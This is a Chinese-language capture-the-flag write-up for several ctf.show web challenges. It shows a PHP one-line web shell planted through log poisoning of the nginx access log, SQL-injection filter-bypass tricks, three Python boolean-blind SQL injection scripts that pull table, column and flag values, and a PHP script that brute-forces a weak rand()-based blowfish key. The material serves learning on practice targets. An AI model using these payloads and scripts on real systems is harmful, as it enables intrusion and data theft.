签到_观己

过滤了php意思就无法使用文件包含

[huayang]查看日志文件/var/log/nginx/access.log

有ua显示可以使用一句话

<?php @eval($_POST[shell]);?>

蚁剑连接即可在根目录下看见flag

web1_观字

只需把.换成。即可

web2_观星

一看就知道是布尔盲注

记得web1-14有类似的题

查一下过滤

顺便再贴一个fuzz https://github.com/fuzzdb-project/fuzzdb

建议自己写

去扒羽师傅的(●’◡’●)

逗号过滤，采用substr((database())from({})for(1))的形式
等号和like过滤，用regxep或者in绕过
ascii用ord代替
单引号用16进制绕过
过滤了空格可以用括号代替

#author  羽
import requests
url="http://733ff90c-f8ab-4a3b-af6e-3ebb2f4a7b12.chall.ctf.show/index.php?id=1^"
flag=""
for i in range(1,50):
    print("i="+str(i))
    for j in range(38,126):
        #u="case(ord(substr(database()from({0})for(1))))when({1})then(2)else(3)end".format(i,j)  #库名  web1
        #u="case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #表名 flag、page、user
        #u="case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #列名 FLAG_COLUMN、flag
        u="case(ord(substr((select(group_concat(flag))from(flag))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #flag字段
        u=url+u
        r=requests.get(u)
        t=r.text
        if("I asked nothing" in t):
            flag+=chr(j)
            print(flag)
            break

我简单的改了一下哈哈

import requests
url="http://305d6aed-86db-41a3-b428-8831ce41b54b.chall.ctf.show/index.php?id=1^"
true = 'Languor was'
name = ''
for number1 in range(1,50):
    for number2 in range(38,126):
        # urls="case(ord(substr(database()from(%d)for(1))))when(%d)then(2)else(3)end" % (number1,number2)  #库名  web1
        # urls = "case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from(%d)for(1))))when(%d)then(2)else(3)end" % (number1,number2) #表名 flag、page、user
        # urls = "case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from(%d)for(1))))when(%d)then(2)else(3)end" % (number1,number2) #列名 FLAG_COLUMN、flag
        urls = "case(ord(substr((select(group_concat(flag))from(flag))from(%d)for(1))))when(%d)then(2)else(3)end" % (number1,number2) #flag字段
        urls = url + urls
        response = requests.get(urls)
        if true in response.text:
            name += chr(number2)
            print(name)
            break

2020.10.20 —— 11：42 A.M. 更

换个思路

自己又用另一种方法写了一个以便拓展思路

import requests
url="http://8f65f4ee-c785-40f6-bbad-c2c4890e4850.chall.ctf.show/index.php?id=1^"
true = "all about you"
name = ''
for number1 in range(1,50):
    for number2 in range(44,126):
        #urls = "(ord(substr(database()/**/from/**/%d/**/for/**/1))>%d)" % (number1,number2)
        #urls = "(ord(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/in(database()))/**/from/**/%d/**/for/**/1))>%d)^0" % (number1,number2)
        #urls = "(ord(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/in(0x666c6167))from/**/%d/**/for/**/1/**/))>%d)^0" % (number1,number2)
        urls = "(ord(substr((select(flag)from(flag))from/**/%d/**/for/**/1))>(%d))" % (number1,number2)
        urls = url + urls
        response = requests.get(urls)
        if true in response.text:
            name += chr(number2)
            print(name)
            break

web3_观图

就很草

给出了一个地址。看似是base64实则不是

访问showImage.php

使用了这种加密方式

师傅们说是des

可des的加密写法是des-ecb

这个bf-ecb我实在没查到望师傅留言给予解答

其中openssl_decrypt（）为解密
openssl_encrypt（）为加密

目标已经很明显了

而PHP rand()函数产生的数值的范围最大为32768，我们可以编写爆破脚本

然后再进行加密访问即可

<?php
for($i=0;$i<32768;$i++){
    $key = substr(md5('ctfshow'.$i),3,8);
    $image="Z6Ilu83MIDw=";
    $str = openssl_decrypt($image, 'bf-ecb', $key);
    if(strpos($str,"gif") or strpos($str,"jpg") or strpos($str,"png")){
        print($i);
        break;
    }
}
$key = substr(md5('ctfshow' . $i), 3, 8);
$image = "config.php";
$str = openssl_encrypt($image, 'bf-ecb', $key);
echo urlencode($str);
?>